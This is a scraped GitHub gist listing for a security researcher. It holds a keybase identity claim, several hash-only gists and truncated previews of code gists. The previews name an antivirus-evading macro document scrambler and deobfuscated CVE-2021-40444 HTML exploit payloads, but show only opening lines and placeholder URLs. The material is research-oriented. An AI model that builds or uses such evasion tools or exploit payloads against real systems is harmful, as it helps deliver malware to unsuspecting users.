I hereby claim:
- I am d4stiny on github.
- I am billdemirkapi (https://keybase.io/billdemirkapi) on keybase.
- I have a public key ASAaxyVyjWbAPJHsCoR1QSRqpR3MiLasx056OGP9LcNnpAo
To claim this, I am signing this object:
D4stiny
/ Macro_Scrambler.py
Created
September 16, 2020 07:08
Corrupts macro documents to prevent static analysis by anti-virus while still allowing for the document to be opened in Microsoft Word.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import zipfile | |
| import random | |
| def get_zip_file_header_offset(zip_filename, target_filename): | |
| """ | |
| Parse the file header offset for a target_filename. | |
| :param zip_filename: The name of the zip file to read. | |
| :param target_filename: The name of the file to find the header of. |
D4stiny
/ gist:c5309533b3b07cb5f6067757e449a759
Created
January 25, 2021 00:01
Just a hash for later...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 3C6F60C412CCB3AADBF09887C82D50A0B1DA250445EB8970D86087C086CDF48C |
D4stiny
/ gist:f339cbac4a9f8f2eeec63778bf546f28
Created
February 4, 2021 01:28
Hello stranger, another hash for my collection.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 5169c2b0b13a9b713b3d388e61eb007672e2377afd53720a61231491a4b627f7 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7 |
D4stiny
/ LowUtilities.cpp
Last active
November 22, 2023 02:32
A dependency-less implementation of GetModuleHandle and GetProcAddress.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // An implementation of GetModuleHandle and GetProcAddress that works with manually mapped modules, forwarded exports, | |
| // without a CRT standard library, and uses no Windows API or dependencies. | |
| // | |
| // Author: Bill Demirkapi | |
| // License: MIT, appended at the bottom of this document if you care about licensing and want to credit me in your own project. | |
| // | |
| #include <Windows.h> | |
| #include <winternl.h> |
D4stiny
/ keybase.md
Created
October 19, 2021 05:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DDF218CF99DBF0F21A0C5480331BA07DF4FDB1A6E44E9622B30F0A5B650B9F0E |
D4stiny
/ cve202140444_deobfuscated.html
Created
January 7, 2022 09:13
Deobfuscated HTML payload used in CVE-2021-40444 payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta http-equiv="Expires" content="-1"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=11"> | |
| </head> | |
| <body> | |
| <script> | |
| var exploit_cab = "[CAB file URL]"; |
D4stiny
/ cve202140444_ie.html
Created
January 7, 2022 09:16
CVE-2021-40444 payload ported for Internet Explorer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta http-equiv="Expires" content="-1"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=11"> | |
| </head> | |
| <body> | |
| <script> | |
| var exploit_cab = "[CAB file URL]"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| e5285d895cc1200237f9676985df471f4eba9d13f59541b8df774238a188382bc2c7ce6a75d7346f5b0fe940e2ca196b78edde78912e5bd3a4f0e88e8906c7c1 |
OlderNewer